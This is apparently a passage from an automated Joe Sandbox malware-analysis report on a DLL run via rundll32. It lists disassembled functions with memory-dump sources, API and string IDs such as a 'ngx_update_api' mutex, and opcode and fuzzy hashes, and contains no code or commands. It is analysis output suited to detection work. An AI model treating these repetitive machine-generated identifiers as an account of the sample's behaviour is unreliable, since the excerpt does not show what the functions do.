                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FreeHandleLocalModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2775970868-0
                                                                                                                                  • Opcode ID: 9e3bd118697827140c8c35a418e2f991fb94ac97f9fdae92732178acaa3a4831
                                                                                                                                  • Instruction ID: 0551462ff91d22a87fb988a5bef98e6a35488b8525ef4c5bac8a0e95412434a2
                                                                                                                                  • Opcode Fuzzy Hash: 9e3bd118697827140c8c35a418e2f991fb94ac97f9fdae92732178acaa3a4831
                                                                                                                                  • Instruction Fuzzy Hash: 27112562B0866642FEB95BD6A5A01791291EF44BF2F081638EE6F17BC0DE6DE8414300
                                                                                                                                  Function 000001DA01445008 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4592950432.000001DA01410000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DA01410000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_1da01410000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_getptd_malloc_crt
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 875692556-336475711
                                                                                                                                  • Opcode ID: 87dcd81199e5c75fe6f4eb1ed4ca3c3cad752f6282d2ad23c1f32017a9299fd6
                                                                                                                                  • Instruction ID: 52980dd42ddc9f74861d2457c2215ba91059e54f2d657291044bbedf3e3fd304
                                                                                                                                  • Opcode Fuzzy Hash: 87dcd81199e5c75fe6f4eb1ed4ca3c3cad752f6282d2ad23c1f32017a9299fd6
                                                                                                                                  • Instruction Fuzzy Hash: B841A571728E0C4FEB58EF2C98857E573D1FB99310F41476BE44BC71AADE21E8068686
                                                                                                                                  Function 00007FFD92DC4EF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                  • String ID: pContext
                                                                                                                                  • API String ID: 545576003-2046700901
                                                                                                                                  • Opcode ID: 42b5dbdf8eda4b2c455cc789c80ec8349dee69830d3ecf34cc683787c419d0fc
                                                                                                                                  • Instruction ID: 283d216a7e4af24190be7bf82e7f8adf411ba26f4bda3e69259a960c5ce149d9
                                                                                                                                  • Opcode Fuzzy Hash: 42b5dbdf8eda4b2c455cc789c80ec8349dee69830d3ecf34cc683787c419d0fc
                                                                                                                                  • Instruction Fuzzy Hash: F621B261B09B0A82FF35EFA6E4641B922A5FF88B81F449031CE4E477A1EE6CE505C350
                                                                                                                                  Function 00007FFD92DC54E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Stringtry_get_function
                                                                                                                                  • String ID: LCMapStringEx
                                                                                                                                  • API String ID: 2588686239-3893581201
                                                                                                                                  • Opcode ID: 2c2403fb9563f7bc7397c608fcf11f09139fd6e6f523df1d40ae67460aaeaa86
                                                                                                                                  • Instruction ID: 8d8c47a90357194dd5e07a229d1d42afc99d460c1f4ccbcbc71eb69bae4a004e
                                                                                                                                  • Opcode Fuzzy Hash: 2c2403fb9563f7bc7397c608fcf11f09139fd6e6f523df1d40ae67460aaeaa86
                                                                                                                                  • Instruction Fuzzy Hash: D5214C36B08B8186E770CF96B4502AAB7A5FBC9B80F544236EA8D53B59CF3CD5408B00
                                                                                                                                  Function 00007FFD92DB5AE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: %s - CoCreateInstance on CLSID_WICImagingFactory failed$CNvAnimatedGifStreamEncoderWIC::initialize
                                                                                                                                  • API String ID: 542301482-3781439623
                                                                                                                                  • Opcode ID: d3b19091ed0324d88df89671fc1af45145660e2e85ad139f3cdde19376e2d69d
                                                                                                                                  • Instruction ID: 6826a84480b699cb229868323871a6d47e9962b0142ce82c7d84a5a4efdbff5f
                                                                                                                                  • Opcode Fuzzy Hash: d3b19091ed0324d88df89671fc1af45145660e2e85ad139f3cdde19376e2d69d
                                                                                                                                  • Instruction Fuzzy Hash: CC118E32B08A4682FB208FA5F8603A963A4FB48B88F444035DB5C57768DF7DD855D700
                                                                                                                                  Function 00007FFD92DBCA80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: %s - CoCreateInstance on CLSID_WICImagingFactory failed,$CNvWICImageDecoder::initialize
                                                                                                                                  • API String ID: 542301482-2443861360
                                                                                                                                  • Opcode ID: 93a664d948b0c99a7ed7cf4bc5cc02cfd8e37e51f5e31fbc025b1db1ec8abdb6
                                                                                                                                  • Instruction ID: c0faa29616bfedca44f2e1aff18e05b694765f9f1b8aa527ede22190a70e1d65
                                                                                                                                  • Opcode Fuzzy Hash: 93a664d948b0c99a7ed7cf4bc5cc02cfd8e37e51f5e31fbc025b1db1ec8abdb6
                                                                                                                                  • Instruction Fuzzy Hash: 4911BF32B08A4582FB20CFA9F86026973A4FB48B88F590436DB8D53768DF7EE540D700
                                                                                                                                  Function 00007FFD92DC5830 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateMutexObjectSingleWait
                                                                                                                                  • String ID: ngx_update_api
                                                                                                                                  • API String ID: 3113225513-3046468762
                                                                                                                                  • Opcode ID: b200ed883b0c8e5db8df49f2f841541eb5b53eb944261d028a2ff164a3302a24
                                                                                                                                  • Instruction ID: 802c9092777f514c0d0a6f9a0733987f51d9150b8940c8853399bb9ce1abf76c
                                                                                                                                  • Opcode Fuzzy Hash: b200ed883b0c8e5db8df49f2f841541eb5b53eb944261d028a2ff164a3302a24
                                                                                                                                  • Instruction Fuzzy Hash: D1E09272F05B0182FF35DFB6A8601393295EB48B51B188135C91D56380EE3DA095C300
                                                                                                                                  Function 00007FFD92DBBCD0 Relevance: 5.1, APIs: 4, Instructions: 114COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                  • Opcode ID: 7e5c6a5d257a954f4ece03d72a07074d059db0adc786de0da86780d6e63026fc
                                                                                                                                  • Instruction ID: 1831daa147605a6ecb3b35d6704de58c37bb171ba5af7c16c13913e51db67b3d
                                                                                                                                  • Opcode Fuzzy Hash: 7e5c6a5d257a954f4ece03d72a07074d059db0adc786de0da86780d6e63026fc
                                                                                                                                  • Instruction Fuzzy Hash: 2741C125B09B4686FA30DFE6A8A067962A4BF99BC1F01043ADD0F97B61DF7DE4419700
                                                                                                                                  Function 00007FFD92DBC800 Relevance: 5.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FreeLocal
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1627422176-0
                                                                                                                                  • Opcode ID: fe9ce48e8071581b44f4e0b6b5a870179f355a3f0ac14cbea2713b9be3281c90
                                                                                                                                  • Instruction ID: 09ad259729151909d124520da52196d86d078c333dcba630c277befed381edd6
                                                                                                                                  • Opcode Fuzzy Hash: fe9ce48e8071581b44f4e0b6b5a870179f355a3f0ac14cbea2713b9be3281c90
                                                                                                                                  • Instruction Fuzzy Hash: 3321F531F0864282FB749B96B5A417E5294EF89BE1F481239EE1E43BD5DE6DE8918300